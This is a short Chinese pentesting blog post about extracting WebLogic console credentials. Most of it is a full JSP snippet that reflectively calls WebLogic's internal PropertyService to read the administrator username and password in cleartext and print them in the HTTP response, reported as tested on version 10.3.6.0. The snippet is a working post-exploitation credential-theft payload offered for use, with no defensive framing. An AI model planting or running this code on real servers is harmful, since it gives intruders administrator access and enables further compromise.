以往遇上weblogic的站点时都是通过密钥进行解密获取console的密码,甚至但是解密方法就出现好几种
但是前几个小时在twitter @jas502n师傅公开了Use T3 protocol Get weblogic console username, password这个姿势,于是赶紧学习学习!!!
断点看看代码细节:
代码实现
<%@page import="java.lang.reflect.Field" %>
<%@page import="java.lang.reflect.Method" %>
<%
/**
* 已测试:
* 10.3.6.0
*/
try{
ClassLoader classLoader = Thread.currentThread().getContextClassLoader();
Class httpDataTransferHandler = classLoader.loadClass("weblogic.deploy.service.datatransferhandlers.HttpDataTransferHandler");
Class managementService = classLoader.loadClass("weblogic.management.provider.ManagementService");
Class authenticatedSubject = classLoader.loadClass("weblogic.security.acl.internal.AuthenticatedSubject");
Class propertyService = classLoader.loadClass("weblogic.management.provider.PropertyService");
Field KERNE_ID = httpDataTransferHandler.getDeclaredField("KERNE_ID");
KERNE_ID.setAccessible(true);
Method getPropertyService = managementService.getMethod("getPropertyService",authenticatedSubject);
getPropertyService.setAccessible(true);
Object prop = getPropertyService.invoke((Object) null,KERNE_ID.get((Object) null));
Method getTimestamp1 = propertyService.getMethod("getTimestamp1");
getTimestamp1.setAccessible(true);
Method getTimestamp2 = propertyService.getMethod("getTimestamp2");
getTimestamp2.setAccessible(true);
String username = (String) getTimestamp1.invoke(prop);
String password = (String) getTimestamp2.invoke(prop);
response.getWriter().write( username + "/" + password);
}catch (Exception e) {
e.printStackTrace();
}
%>
测试效果
![【内网渗透】01 Windows 基础回顾]](https://imges-1255470970.cos.ap-nanjing.myqcloud.com/img/496062add1d3223806b2504c321c051d.png)
